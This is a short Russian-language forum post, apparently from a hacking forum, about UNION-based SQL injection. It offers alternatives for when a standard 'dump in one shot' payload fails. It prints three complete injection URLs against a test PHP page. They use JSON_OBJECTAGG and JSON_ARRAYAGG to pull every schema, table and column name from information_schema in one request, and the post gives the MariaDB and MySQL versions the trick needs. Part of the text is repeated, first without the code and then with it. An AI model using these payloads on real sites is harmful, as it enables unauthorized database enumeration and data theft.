- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Иногда на сайте есть типовая UNION-based SQLi, но DIOS запросы по тем или иным причинам не прокатывают.
В этом случае теоретически могут помочь стандартные функции:
Если стандартный DIOS
То его аналоги
Или вот так:
Из недостатков:
работает только в новых версиях SQL, а именно
MariaDB >= 10.5.0 (Proof = Для просмотра ссылки Войдиили Зарегистрируйся)
MySQL >= 5.7.22 (Proof = Для просмотра ссылки Войдиили Зарегистрируйся)
В этом случае теоретически могут помочь стандартные функции:
- JSON_OBJECTAGG(key, value)
- JSON_ARRAYAGG(column_or_expression)
Если стандартный DIOS
Код:
http://localhost/url1/inj_test.php?username=text2%27union+select+1,2,3,(select(select%20concat(@:=0xa7,(select%20count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))+--+То его аналоги
Код:
http://localhost/url1/inj_test.php?username=text2%27union+select+1,2,3,JSON_OBJECTAGG(concat(table_schema,0x3a,table_name),column_name)+from+information_schema.columns+--+Или вот так:
Код:
http://localhost/url1/inj_test.php?username=text2%27union+select+1,2,3,JSON_ARRAYAGG(concat(table_schema,0x3a,table_name,0x3a,column_name))+from+information_schema.columns+--+Из недостатков:
работает только в новых версиях SQL, а именно
MariaDB >= 10.5.0 (Proof = Для просмотра ссылки Войди
MySQL >= 5.7.22 (Proof = Для просмотра ссылки Войди